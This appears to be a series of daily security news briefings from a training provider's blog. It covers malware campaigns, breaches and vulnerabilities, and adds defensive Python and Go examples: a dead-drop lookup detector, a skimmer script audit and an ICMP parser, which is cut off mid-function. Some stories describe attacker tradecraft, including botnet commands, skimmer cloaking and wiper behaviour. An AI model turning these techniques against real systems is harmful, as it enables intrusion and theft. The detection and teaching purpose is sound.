Site blog

Les Bell
by Les Bell - Monday, 12 December 2022, 9:37 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Ethics of Reporting on Privacy Breaches

An interesting article on the ABC (Australia) web site examines the ethical issues faced by reporters in covering privacy breaches such as the recent Medibank breach. It's a topic I explore in a cybersecurity management course I teach, via a case study in which a hotel chain suffers a cryptominer infection via its guest wifi network. A relatively minor incident causes major reputational damage as security bloggers publicize it (coupled with inept crisis communications by the hotel chain's PR person), and I get students to discuss the allocation of responsibility, accountability and liability among the hotel IT staff, the hackers, the bloggers and the hotel guests themselves (after all, do you trust public wifi networks? I don't).

The Medibank breach was much more serious, seeing the release of personal medical information for millions of people. The ABC article examines the role of the general media in increasing the leverage available to extortionists, as well as the impact of reporting on the victims. It's thought-provoking material and useful to bear in mind for any future incident response planning, especially for crisis communications.

Terzon, Emilia, The editorial questions ABC News journalists faced when covering the Medibank data leak, ABC News, 11 December 2022. Available online at https://www.abc.net.au/news/backstory/2022-12-11/editorial-questions-reporting-on-medibank-hack/101737920.

Iranian Web Shell Campaign Uses GitHub as Dead Drop Resolver

Secureworks Counter Threat Unit researchers have reported on a malware campaign being run by a subgroup of the Iranian government-sponsored threat group COBALT MIRAGE. The initial intrusion is performed using any of several techniques; the specific intrusion analyzed by Secureworks started with the compromise of a VMware Horizon server using two Log4j vulnerabilities.

Once initial access was obtained, the threat actor uploaded the Drokbk malware as a zip file, which was extracted and then executed. The first stage of the malware is a dropper, which writes a file, SessionService.exe, from an internal resource and then adds it to the SessionManagerService in order to persist. SessionService.exe is then executed; it begins by finding its C2 domain, which it does using the 'dead drop resolver' technique. This allows an actor to completely change its C2 infrastructure, since malware already in operation can rediscover the new C2 infrastructure via a public service, such as AWS S3 buckets, Pastebin or even comments on Britney Spears's Instagram account (yes, really). In this case, Drokbk uses the README.md file of a GitHub account to relay the C2 server name.

The analyzed sample initially sent a request, containing the hostname and time, to the C2 server, but no commands were received in response. Drokbk is only one of the tools being used by this threat actor; they are also known to use the Fast Reverse Proxy (FRPC) tool.

Secureworks Counter Threat Unit Team, Drokbk Malware Uses GitHub as Dead Drop Resolver, blog post, 9 December 2022. Available online at https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver.

Janicab Reemerges, Targeting Middle East and Europe

The Janicab backdoor, first seen in 2013, has reemerged in a campaign by a threat actor tagged DeathStalker, which appears to be targeting financial and legal institutions as well as travel agents in the Middle East and Europe, according to Kaspersky researchers. Janicab is cross-platform malware, able to run on both macOS and Windows; the Windows version uses a VBScript-based implant as the final stage and, rather than relying on downloaded exploitation tools, has much of the required functionality implemented internally.

Initial compromise is achieved via spear-phishing, using targeted lures in the form of a ZIP file containing a LNK-based dropper as well as a decoy document. Opening the LNK file executes a chain of malware files - an initial loader, a second stage which extracts a CAB archive containing additional resources and Python code, and finally, the last stage which is the Janicab backdoor. This then deploys a new LNK file into the Startup folder in order to persist.

Like Drokbk, described above, Janicab uses the 'dead drop resolver' technique to locate its C2 server - DeathStalker uses YouTube and WordPress web services for this purpose. Once communication is established, Janicab can perform a variety of functions such as keystroke logging, screen capture, running commands, checking for installed malware, etc. The use of VBScript allows new modules to be added easily, and the number of variants seen to date suggests that it is under active development.
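Both the Drokbk and Janicab items above describe the same 'dead drop resolver' pattern: an implant fetches a page on a public service (a GitHub README.md, a YouTube or WordPress page) to learn its C2 address. The following is an added example, not code from the original post or from the Secureworks or Kaspersky reports, showing one way a defender can triage proxy logs for such lookups; the log layout, the watch-list of hosts and the browser user-agent heuristic are assumptions for the illustration.

```python
"""Flag proxy-log requests that look like dead-drop-resolver lookups.

Heuristic: a request to a public service that malware is known to use as a
dead drop, made by something that does not identify itself as a browser.
Expect false positives from git clients and package managers; tune the
watch-list and add allow-listed client IPs before alerting on this.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import urlsplit

# Services named on this page as dead-drop hosts (GitHub for Drokbk, YouTube and
# WordPress for Janicab, plus Pastebin and Instagram from the Drokbk write-up).
# raw.githubusercontent.com is where a README.md is actually served from.
# Assumption: this is the watch-list; extend it for your environment.
DEAD_DROP_HOSTS = {
    "github.com", "raw.githubusercontent.com",
    "pastebin.com",
    "youtube.com", "youtu.be",
    "wordpress.com",
    "instagram.com",
}

# Real browsers send one of these tokens; implants frequently send none.
BROWSER_UA = re.compile(r"Mozilla/\d|Chrome/|Firefox/|Safari/|Edg/")

# Assumed proxy log layout (constructed for this example):
#   <timestamp> <client-ip> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+'
    r'(?P<status>\d{3})\s+"(?P<ua>[^"]*)"\s*$'
)


@dataclass(frozen=True)
class Alert:
    ts: str
    client: str
    host: str
    reason: str


def normalise_host(url: str) -> str:
    """Lower-case the host and drop a leading 'www.' so www.youtube.com matches."""
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def classify(entry: dict) -> Optional[str]:
    """Return a reason string if the request looks like a dead-drop lookup."""
    host = normalise_host(entry["url"])
    if host not in DEAD_DROP_HOSTS:
        return None
    if BROWSER_UA.search(entry["ua"]):
        return None  # interactive browsing of these sites is normal
    path = urlsplit(entry["url"]).path.lower()
    if path.endswith("readme.md"):
        return "README.md fetched from GitHub by a non-browser user agent"
    return "dead-drop-capable host fetched by a non-browser user agent"


def scan(lines: Iterable[str]) -> List[Alert]:
    """Parse each log line and collect alerts for suspicious requests."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed line; a real pipeline would count these
        entry = m.groupdict()
        reason = classify(entry)
        if reason:
            alerts.append(Alert(entry["ts"], entry["client"],
                                normalise_host(entry["url"]), reason))
    return alerts


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '2022-12-09T10:01:02Z 10.1.2.3 GET https://github.com/example/repo 200 '
    '"Mozilla/5.0 (Windows NT 10.0) Chrome/108.0 Safari/537.36"',
    '2022-12-09T10:01:09Z 10.1.2.44 GET '
    'https://raw.githubusercontent.com/example-user/example-repo/main/README.md 200 ""',
    '2022-12-09T10:02:15Z 10.1.2.44 GET https://pastebin.com/raw/EXAMPLE01 200 '
    '"curl/7.85.0"',
    '2022-12-09T10:03:00Z 10.1.2.3 GET https://www.example.com/updates.xml 200 ""',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a.ts} {a.client} {a.host}: {a.reason}")
```

Running it on the constructed sample flags only the two requests from 10.1.2.44; a second pass that groups alerts by client and looks for periodic polling of the same URL is the natural next step.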

Global Research and Analysis Team, DeathStalker targets legal entities with new Janicab variant, APT report, 8 December 2022. Available online at https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags:
[ Modified: Monday, 12 December 2022, 10:36 AM ]
 
by Les Bell - Saturday, 10 December 2022, 9:27 AM

News Stories


Poorly-maintained E-commerce Sites Infected with Skimmers

Skimmers have increasingly infected online stores, stealing customer credit card details from their web browsers as they enter them for payment processing. In many cases, they are loaded as part of the payment-processing page, typically as third-party libraries that have somehow been included in error by developers, and the problem is exacerbated by the fact that security staff can see what is going on on their own systems, but not what third-party code is doing in customers' browsers.

Now researchers at Jscrambler report on three new threat groups using a new technique to run these attacks. In the first case, the threat actor acquired the expired domain name of a third-party marketing and analytics service called Cockpit, replacing its library with their own malicious code. Using this technique, the attackers were able to compromise over 40 e-commerce sites, exfiltrating credit card details to a C2 server based in Russia. The Cockpit service was shut down in 2014, but the sites had not removed the deprecated libraries - a very basic error.

In the other campaigns, the skimmer code is injected directly, as a fake Google Analytics integration, although the code is similar. In all cases, the site that hosts the JavaScript checks the HTTP Referer header value and, based on this, will either return no script at all (to make analysis more difficult), a default skimmer script, or a site-specific skimmer. It also typically only runs on two specific pages - the order page and the register page. All the campaigns make use of obfuscation techniques and encryption of exfiltrated data to hinder detection and analysis.
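The Cockpit case worked because sites kept loading a library from a domain whose owner had changed, with nothing on the page to notice the swap. As an added example (not code from the Jscrambler report or any of the sites involved), the following audits a checkout page's external scripts: it lists every third-party <script src>, flags hosts that are not on a deliberate allow-list, and flags allow-listed scripts that carry no Subresource Integrity hash. The sample page, page host and allow-list are constructed assumptions.

```python
"""List third-party scripts on a page and flag skimmer-friendly weaknesses.

A script from a host nobody on the team can vouch for is the Cockpit
pattern; a script from a trusted host but without an integrity attribute
would still load a silently replaced library. Note that SRI only helps for
libraries that do not change, and needs the host to send CORS headers.
"""
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List, Set
from urllib.parse import urlsplit


@dataclass(frozen=True)
class ScriptFinding:
    src: str
    host: str
    severity: str
    detail: str


class _ScriptCollector(HTMLParser):
    """Collect (src, integrity) pairs from every <script src=...> tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = dict(attrs)  # html.parser lower-cases attribute names
        if a.get("src"):
            self.scripts.append((a["src"], a.get("integrity")))


def audit_scripts(html: str, page_host: str,
                  allowed_hosts: Set[str]) -> List[ScriptFinding]:
    """Return findings for external scripts; first-party scripts are skipped."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src, integrity in parser.scripts:
        # Relative URLs have no host and are first-party; '//host/x.js' does.
        host = (urlsplit(src).hostname or page_host).lower()
        if host == page_host:
            continue
        if host not in allowed_hosts:
            findings.append(ScriptFinding(
                src, host, "high",
                "third-party host not on the allow-list: remove the tag or "
                "add the host deliberately after checking who controls it"))
        elif integrity is None:
            findings.append(ScriptFinding(
                src, host, "medium",
                "allow-listed host but no integrity attribute: a swapped "
                "library would load unnoticed"))
    return findings


# Constructed sample checkout page; '.invalid' hosts are placeholders.
PAGE_HOST = "shop.example.invalid"
ALLOWED_HOSTS = {"cdn.example-allowed.invalid"}
SAMPLE_PAGE = """
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-allowed.invalid/analytics.js"
        integrity="sha384-CONSTRUCTED-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://cdn.example-allowed.invalid/widgets.js"></script>
<script src="//cockpit-example.invalid/cockpit.js"></script>
</head><body><form id="order"></form></body></html>
"""

if __name__ == "__main__":
    for f in audit_scripts(SAMPLE_PAGE, PAGE_HOST, ALLOWED_HOSTS):
        print(f"[{f.severity}] {f.host} {f.src}: {f.detail}")
```

A Content-Security-Policy script-src directive built from the same allow-list is the enforcement counterpart to this audit; the audit tells you what the policy would block.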

Fortuna, Pedro, Pedro Marrucho and David Alves, Defcon Skimming: A new batch of Web Skimming attacks, blog post, 5 November 2022. Available online at https://blog.jscrambler.com/defcon-skimming-a-new-batch-of-web-skimming-attacks/.

Four Sydney Men Arrested for Part in $US100 million Online Scam

Four Chinese nationals living in Sydney have been arrested by the Australian Federal Police for their part in an online investments scam that has resulted in over $US100 million in losses world-wide. The arrests follow intelligence supplied by the US Secret Service which led the AFP to set up Operation Wickham to investigate the scam, in cooperation with the NSW Police Force.

The scam started with a range of social engineering techniques to gain the trust of potential victims via dating sites, employment sites and messaging platforms before mentioning investment opportunities. Once on the hook, victims were directed to a mixture of legitimate and fraudulent applications that deal in foreign exchange and cryptocurrency trading, but which have been manipulated to show a faked positive return on investments. Victims were also directed to a financial investment service which shows manipulated data through a legitimate application in order to encourage further investment while concealing the fact that their money has actually been stolen.

The four men who were arrested will appear in court in January, when police will allege they were used to register Australian companies in order to enhance the legitimacy of the fraud, as well as to launder the proceeds of the crime through Australian bank accounts (with $A22.5 million being restrained by the AFP in 24 bank accounts). Two of the men, aged 19, will be charged with recklessly dealing with proceeds of crime, while two others, aged 24 and 27, who were arrested in late November while trying to leave the country, are alleged to be the Australian 'controllers' of the syndicate.

AFP Media, Four men charged in Sydney for sophisticated cyber scam - world-wide losses expected to top US$100 million, media release, 9 December 2022. Available online at https://www.afp.gov.au/news-media/media-releases/four-men-charged-sydney-sophisticated-cyber-scam-world-wide-losses.

Google Opens Kimono on Android Privacy

Many Android features run continuously, accessing potentially sensitive information. For example, the Now Playing feature of Pixel phones continuously listens, through the microphone, in order to identify the music you can hear. Now, ask yourself how often you hear people say, "We were just talking yesterday about x, and today I'm getting lots of Facebook ads for x - I swear these machines are listening to us!", and you can begin to understand why many people have concerns about their personal privacy.

As phone brands compete on the level of proactive personalization they provide, they can only offer services such as traffic monitoring for efficient navigation if consumers are willing to make use of such features. To aid in this, Google has released details of, and open-sourced, a key component of the Android privacy architecture, called Private Compute Core. This is a secure and isolated component of the Android OS that allows users to control how, when and where data is processed, both on-phone and by cloud services - for example, the latest phones are sufficiently powerful to perform some translation tasks on the phone itself, without interacting with the cloud.

In particular, Private Compute Core supports federated learning and analytics, which allows training of machine learning models while keeping private data on the phone. In essence, this downloads a training model to a sample set of users' phones; the models train on the data and then return the training results - not the data - back to the cloud. Model testing is performed in a similar, distributed, fashion, and differential privacy is also applied.

Google has now released a white paper describing the Private Compute Core, which controls data privacy for this process, and has also open-sourced the code as a GitHub project.

Kleidermacher, Dave, Dianne Hackborn and Eugenio Marchiori, Trust in transparency: Private Compute Core, blog post, 8 December 2022. Available online at https://security.googleblog.com/2022/12/trust-in-transparency-private-compute.html.

Cisco Warns of VoIP Phone Vulnerability

Cisco has issued a security advisory for its IP Phone 7800 and 8800 series firmware. A vulnerability in the Cisco Discovery Protocol (CDP) code can allow an unauthenticated attacker on the LAN to perform a stack smashing attack, allowing at least a denial of service, if not remote code execution.

There are no workarounds, other than disabling CDP and relying on Link Layer Discovery Protocol (LLDP) to allow the phone to discover its VLAN, negotiate PoE, etc. - but this is a non-trivial and labour-intensive process. Enterprises which have been diligent in separating VoIP traffic from other data - ideally on a physically-separate network, if not a VLAN - will be much harder to exploit than those which have not, but ultimately the only fix is to obtain and deploy updated firmware, which will be released in January.

Cisco, Cisco IP Phone 7800 and 8800 Series Cisco Discovery Protocol Stack Overflow Vulnerability, security advisory, 8 December 2022. Available online at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipp-oobwrite-8cMF5r7U.


by Les Bell - Friday, 9 December 2022, 9:12 AM

News Stories


Government of Vanuatu Networks Shut Down

We start with a story which seems to have slipped under the radar for the last month. Following an election in the tiny Pacific islands nation of Vanuatu, when the new government took office on 6 November, they discovered that government email accounts would not work - and neither would any other computerized government services, such as driver's licence renewals, tax payments or medical information.

Being a tiny nation spread across many islands, there are few opportunities for redundancy in Vanuatu's computer networks, and so government systems are highly centralized in the capital, Port Vila. Government officials first discovered suspicious activity on their networks on 6 December, but only revealed the breach to local media several days later, with international media slow to pick up on the attack. Meanwhile, government services reverted to using pen and paper - which will severely slow service delivery across the dozens of islands that make up the country.

The Australian Cyber Security Centre has provided assistance, and several weeks on, approximately 70% of government services had been restored. These include financial services, health procurement, immigration and passport data and, most importantly, phone connections for emergency services.

As a small dot on the globe, albeit often voted the happiest nation in the world - and if you have visited, you'll know exactly what I mean - Vanuatu may have escaped attention from cybercriminals. But now the cyber world has caught up with it, and it may possibly have finally been subjected to a ransomware attack, although there is no confirmation of this.

McLaughlin, Jenna, The Pacific island nation of Vanuatu has been knocked offline for more than a month, NPR, 6 December 2022. Available online at https://www.npr.org/2022/12/06/1140752192/the-pacific-island-nation-of-vanuatu-has-been-knocked-offline-for-more-than-a-mo.

Internet Explorer Vulnerabilities Still Causing Damage

The tightly-coupled innards of Windows continue to cause trouble for Microsoft and its customers. Internet Explorer may be officially dead, replaced by Edge, but the Microsoft software ecosystem still relies on IE components for some functionality. An example is Microsoft Word, which renders HTML content in rich text documents using IE.

Now Google's Threat Analysis Group reports the discovery in October of a 0day exploit in the wild, targeting users in South Korea. The lure was an Office document entitled "221031 Seoul Yongsan Itaewon accident response situation (06:00).docx" - a reference to the tragic crowd crush incident during Seoul Halloween celebrations.

Once opened, the document downloads a remote RTF template containing HTML, which causes Office to call the IE rendering engine DLL. This technique is well known, but in this case, it exploits a 0day vulnerability (CVE-2022-41128) in the IE JScript engine. The exploit JavaScript first contacts a C2 server, then launches the exploit shellcode, which covers its tracks by erasing the IE cache and history before downloading the next stage. Google's analysts did not have access to that code, but the same attackers have previously used a variety of implants such as ROKRAT, BLUELIGHT and DOLPHIN.

The infection could easily be blocked by an alert user, since the downloaded document carries the Mark of the Web and requires the user to disable protected view and allow editing. The attack is attributed to the North Korean group APT37, also known as ScarCruft, Reaper and InkySquid.

LeCigne, Clement and Benoit Sevens, Internet Explorer 0-day exploited by North Korean actor APT37, blog post, 7 December 2022. Available online at https://blog.google/threat-analysis-group/internet-explorer-0-day-exploited-by-north-korean-actor-apt37/.

Darknet Service Trojanizes Legitimate Android Apps

A banking trojan campaign uncovered by fraud intelligence firm ThreatFabric has led investigators to a third-party dark web service which can bind malicious payloads to legitimate Android applications, thereby tricking victims into installing them.

The initial campaign employed several types of desktop malware such as the Erbium stealer, Aurora stealer and Laplas clipper, as well as the Ermac Android banking trojan. The latter was distributed by a one-page website offering applications for wi-fi authorization; several updates were downloaded, with payloads targeting different banking applications. The same site also offered downloads for Windows, which also carried banking trojans.

The researchers tracked these back to a binding service, initially offered by a threat actor in March 2022, called Zombinder, which is now used by several different actors. This is being used to distribute a variety of mobile malware, mainly banking trojans such as Ermac and Xenomorph.

Uncredited, Zombinder: new obfuscation service used by Ermac, now distributed next to desktop stealers, blog post, 8 December 2022. Available online at https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html.

Medibank Goes Offline To Remediate Its Networks

Australian insurer Medibank will take its systems offline - and close its retail storefronts - this weekend while it performs remediation work on the networks and systems which were affected by its recent highly-publicized data breach. All systems for both Medibank and its ahm general insurance subsidiary will be offline from 8:30 pm AEDT tonight (9 December) and are expected to be back online by Sunday 11 December at the latest.

The Medibank app, as well as online terminals for directly processing claims at service provider practices, will also be offline.  The lesson: never underestimate remediation costs following a breach.

Uncredited, Planned outage to Medibank systems, notification, 7 December 2022. Available online at https://www.medibank.com.au/health-insurance/info/cyber-security/.


by Les Bell - Thursday, 8 December 2022, 8:47 AM

News Stories


New Botnet Targets Multiple Architectures

FortiGuard Labs researchers have observed, and now analysed, a new botnet which is written in the Go programming language and is targeting IoT devices running on a variety of processor architectures - i386, amd64, arm, arm64, mips, mips64, mipsle, ppc64, ppc64le, riscv64 and s390x (although it is hard to imagine many IoT devices running the S/390 mainframe instruction set).

The botnet, called Zerobot, initially had only basic capabilities but in late November it added more functionality. Disassembly of the code revealed that after initial infection it tests Internet connectivity and then copies itself onto the target device, in an OS-dependent location, and then sets up a signal handler to intercept attempts to kill it. From there, it connects to its C2 server using the WebSocket protocol and sends some platform enumeration data, after which it waits for a command.

Zerobot Commands

    Command        Detail
    ping           Heartbeat, maintaining the C2 connection
    attack         Launch an attack, using different protocols: TCP, UDP, TLS, HTTP, ICMP
    stop           Stop attack
    update         Install update and restart Zerobot
    enable_scan    Scan for open ports and start spreading itself via exploit or SSH/Telnet cracker
    disable_scan   Disable scanning
    command        Run an OS command, using cmd.exe on Windows and bash on Linux
    kill           Kill the botnet program

Zerobot can employ any of 21 different exploits which target a range of IoT devices but also include Spring4Shell, and exploits for phpAdmin and F5 Big-IP. It is rapidly evolving; within a very short time it was updated with string obfuscation, a copy file module and a propagation exploit module which gives it the ability to infect more devices. The FortiGuard Research post includes IOCs, but its rapid evolution means that proactive patching against its exploits will be the best defence.

Lin, Cara, Zerobot - New Go-Based Botnet Campaign Targets Multiple Vulnerabilities, blog post, 6 December 2022. Available online at https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities.

Sophisticated Attack on Amnesty International Canada

Amnesty International Canada (English-speaking Section) has revealed that it was the target of a sophisticated cyberattack which forensic experts from Secureworks believe was sponsored by the Chinese state. This conclusion is based on "the nature of the targeted information as well as the observed tools and behaviors, which are consistent with those associated with Chinese cyberespionage threat groups".

The breach was first detected on 5 October 2022, when suspicious behaviour was observed on Amnesty's IT infrastructure. Immediate action was taken, with Secureworks being retained to protect the organization's systems and investigate the attack. The investigation has uncovered no evidence that any donor or membership data was exfiltrated.

Amnesty is speaking publicly to warn other human rights organizations about the rising threat of cyber breaches, and to strongly condemn state and non-state actors who are intent on interfering with the work of human rights and other civil society organizations.

Ruf, Cory, Amnesty International Canada target of sophisticated cyber-attack linked to China, news release, 5 December 2022. Available online at https://www.amnesty.ca/news/news-releases/cyber-breach-statement/.

Likely Chinese APT Targets Middle East Telco

Researchers at Bitdefender have found a new cyber-espionage campaign which targeted a telecommunications firm in the Middle East. Investigation of sample binaries suggests the campaign can be attributed to a Chinese threat actor called BackdoorDiplomacy.

The initial infection mechanism was an August 2021 ProxyShell exploitation of a vulnerable Exchange server. From there, the group deployed the NPS proxy tool and the IRAFAU backdoor into the organization. In February 2022, the attackers deployed the Quarian backdoor along with several other scanners and proxy/tunneling tools, with the use of keyloggers and exfiltration tools suggesting the campaign objective is cyber-espionage.

BackdoorDiplomacy has been operating since at least 2017, targeting institutions in the Middle East, Africa and the US. The researchers have produced a comprehensive 33-page whitepaper which details the techniques used for initial access, execution, reconnaissance, lateral movement, persistence, privilege escalation, defence evasion, collection and infiltration, as well as cataloguing the various tools used.

Schipor, Adrian and Victor Vrabie, BackdoorDiplomacy Wields New Tools in Fresh Middle East Campaign, blog post, 7 December 2022. Available online at https://www.bitdefender.com/blog/labs/backdoor-diplomacy-wields-new-tools-in-fresh-middle-east-campaign.


by Les Bell - Wednesday, 7 December 2022, 8:24 AM

News Stories


Russian Mayors' Offices, Courts, Hit by Wiper

Who can forget 2017's NotPetya attack - a wiper which spread around the world and across industries, yet likely started as an attack on the Ukrainian Government's tax revenues, by Russian threat actors? Now Russia is on the receiving end of a wiper attack, although it seems unlikely to have quite the same impact.

According to Kaspersky researchers, CryWiper is written in C++ and, unusually, compiled using the MinGW-w64 toolkit and gcc compiler, rather than the more common Microsoft tools - suggesting that the author was using a non-Microsoft OS for development. After creating a scheduled task in order to remain active, the malware contacts its C2 server, passing the name of the infected computer and, in response, the C2 server replies 'run' or 'do not run'. If instructed not to run, the malware delays execution with the intention of checking again in 4 days.

But if run, CryWiper stops any running MySQL or SQL Server databases, deletes shadow copies of files and blocks RDP connections, presumably to slow incident responders. It then sets about overwriting user files with random data, which it generates using the Mersenne Twister pseudo-random number generator (a characteristic it shares with the IsaacWiper malware). It also leaves a ransom demand in a README.txt file - but of course, there is no point in paying the ransom, since the data is gone.

CryWiper has been attacking systems in the Russian Federation, particularly courts and mayors' offices.

Sinitsyn, Fedor and Janis Zinchenko, New CryWiper Trojan Pretends to Be Ransomware (Новый троянец CryWiper прикидывается шифровальщиком), Kaspersky SecureList blog, 1 December 2022. Available online at https://securelist.ru/novyj-troyanec-crywiper/106114/. Google translation at https://securelist-ru.translate.goog/novyj-troyanec-crywiper/106114/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp.

Ransomware is Accidental Wiper

In related news, Fortinet Labs reports on a ransomware toolkit called Cryptonite which has been used to produce customised ransomware for targeted campaigns. The toolkit provides a simple sample which lets the operator set an exclusion list server URL, email address and bitcoin wallet, but which lacks the more advanced features common in today's ransomware, such as shadow copy file deletion, file unlocking (e.g. stopping databases, as in the CryWiper example above), and antiforensics and evasion techniques.

However, Fortinet stumbled across a sample in the wild which went through all the steps of encryption, even displaying a progress bar as it pretended to be a software update. However, it never displayed the final window which would allow the victim to enter a decryption key. Suspecting the threat actor behind this sample had deliberately turned it into a wiper, the researchers set about decompiling the sample into its original Python code.

After being led astray by an interesting failure in the decompilation process, they turned to dynamic analysis, eventually running the sample in a cmd.exe window, which produced an error message that revealed all: the ransomware failed to load the tkinter library, which would be used to produce the pop-up window for the decryption key (tkinter is commonly used to implement GUIs for a number of scripting languages). This leaves no way for the victim to recover, as the decryption key is lost from memory when the program crashes, and is never sent to the operator.

The saving grace is that Cryptonite is very basic and should be easily detected by anti-malware programs. Also, the toolkit has now been removed from GitHub.

Revay, Gergely, The Story of a Ransomware Turning into an Accidental Wiper, blog post, 5 November 2022. Available online at https://www.fortinet.com/blog/threat-research/The-story-of-a-ransomware-turning-into-an-accidental-wiper.

Servers at Risk of RCE Exploits Via Baseboard Management Controllers

Last week we wrote of vulnerabilities in baseboard management controller chips which had been repurposed into devices on the Internet of Things. It was, perhaps, inevitable that the same vulnerabilities would show up in the rackmount servers which are the intended use case for BMC chips - and they have, according to a report from Eclypsium.

The vulnerabilities are actually in the AMI MegaRAC software which runs on the BMC circuitry of servers from many manufacturers including DELL EMC, HP Enterprise, and Lenovo as well as motherboard manufacturers such as ASRock, ASUS and Gigabyte. Eclypsium refers to the three vulnerabilities as BMC&C:

  • CVE-2022-40259 – Arbitrary Code Execution via Redfish API (CVSS v3.1 score: 9.9, Critical)
  • CVE-2022-40242 – Default credentials for UID = 0 shell via SSH (CVSS v3.1 score: 8.3, High)
  • CVE-2022-2827 – User enumeration via API (CVSS v3.1 score: 7.5, High)

Redfish is the successor to the older IPMI, and provides an API for server management in data centers. It is supported by almost all major vendors as well as the OpenBMC firmware project. The first two CVE's both lead directly to a root shell, with no further escalation necessary.

Suggested mitigations include ensuring that remote management interfaces are on dedicated management networks and not exposed externally, and disabling built-in administrative accounts.

Babkin, Vlad, Supply Chain Vulnerabilities Put Server Ecosystem at Risk, blog post, 5 December 2022. Available online at https://eclypsium.com/2022/12/05/supply-chain-vulnerabilities-put-server-ecosystem-at-risk/.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

by Les Bell - Tuesday, 6 December 2022, 9:44 AM

News Stories


Remember Ping of Death? You Are Not Alone

Many years ago, systems which used code from the BSD TCP/IP stack - which was most OS's of the era, including Windows - were plagued by a buffer overflow in the IP fragment reassembly code which would instantly crash the targeted system. This exploit was nicknamed the 'Ping of Death'. Now FreeBSD users are having a sense of deja vu, as they come to grips with a buffer overflow in the ping utility.

In order to process the ICMP echo reply (or other error) responses it receives, ping has to reconstruct the received IP header, its ICMP payload and - if there is one - the IP and ICMP headers of the error-generating datagram, which is the payload of ICMP itself. To do this, it calls a pr_pack() function which - and here's the vulnerability - fails to allow for any IP header options in either of the two IP headers. If there are options, the result is that the destination buffer is overflowed by up to 40 bytes - and those bytes could be carrying shellcode. Can you spell RCE? I knew you could!

But it gets better: because ping uses ICMP, it has to make use of a raw socket to work, and this requires root privileges - so it runs as a SetUID executable; in other words, as root. The saving grace is that the ping process runs in a capability mode sandbox on the affected versions of FreeBSD, and is thus very constrained in how it can interact with the rest of the system. But it's surprising what an ingenious attacker can achieve from such a tenuous toehold on a targeted system.

There is no workaround, and all supported versions of FreeBSD are affected. The fix is to upgrade to a supported version dated after 2022-11-29 23:00 UTC, approximately - see the security advisory for full details.
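Added example, not FreeBSD's code: a Go walk over an ICMP error message of the kind pr_pack() processes, with the length check the function lacked. Field offsets follow the standard IPv4 and ICMP header layouts (version/IHL in the first byte, protocol at offset 9); the sample datagrams are constructed here, not captured traffic.

```go
package main

import (
	"errors"
	"fmt"
)

const (
	ipMinHdr   = 20 // IPv4 header with no options
	ipMaxHdr   = 60 // IHL is four bits of 32-bit words, so 15 * 4 at most
	icmpMinHdr = 8
)

// ErrTruncated means a header declares more bytes than the datagram holds.
var ErrTruncated = errors.New("header extends past end of datagram")

// ICMPErrorView records what a bounds-checked walk of an ICMP error found.
type ICMPErrorView struct {
	OuterIPLen   int // outer IP header length, options included
	OuterOptions int // option bytes a fixed 20-byte copy would have overrun
	ICMPType     byte
	InnerIPLen   int // quoted IP header length, options included
	InnerOptions int
	InnerProto   byte
}

// ipHdrLen returns the byte length an IPv4 header declares in its IHL field,
// after checking that the buffer really holds that many bytes. Treating every
// header as 20 bytes, which is what the flawed copy did, skips this step.
func ipHdrLen(b []byte) (int, error) {
	if len(b) < ipMinHdr {
		return 0, ErrTruncated
	}
	if b[0]>>4 != 4 {
		return 0, errors.New("not an IPv4 header")
	}
	ihl := int(b[0]&0x0f) * 4
	if ihl < ipMinHdr {
		return 0, errors.New("IHL below the 20-byte minimum")
	}
	if ihl > len(b) {
		return 0, ErrTruncated
	}
	return ihl, nil
}

// ParseICMPError walks the outer IP header, the ICMP header and the quoted IP
// header of the datagram that provoked the error, as ping must when it prints
// "Destination Host Unreachable" and the like.
func ParseICMPError(pkt []byte) (ICMPErrorView, error) {
	var v ICMPErrorView
	outer, err := ipHdrLen(pkt)
	if err != nil {
		return v, fmt.Errorf("outer IP header: %w", err)
	}
	v.OuterIPLen, v.OuterOptions = outer, outer-ipMinHdr
	rest := pkt[outer:]
	if len(rest) < icmpMinHdr {
		return v, fmt.Errorf("ICMP header: %w", ErrTruncated)
	}
	v.ICMPType = rest[0]
	quoted := rest[icmpMinHdr:] // ICMP errors quote the offending datagram's header
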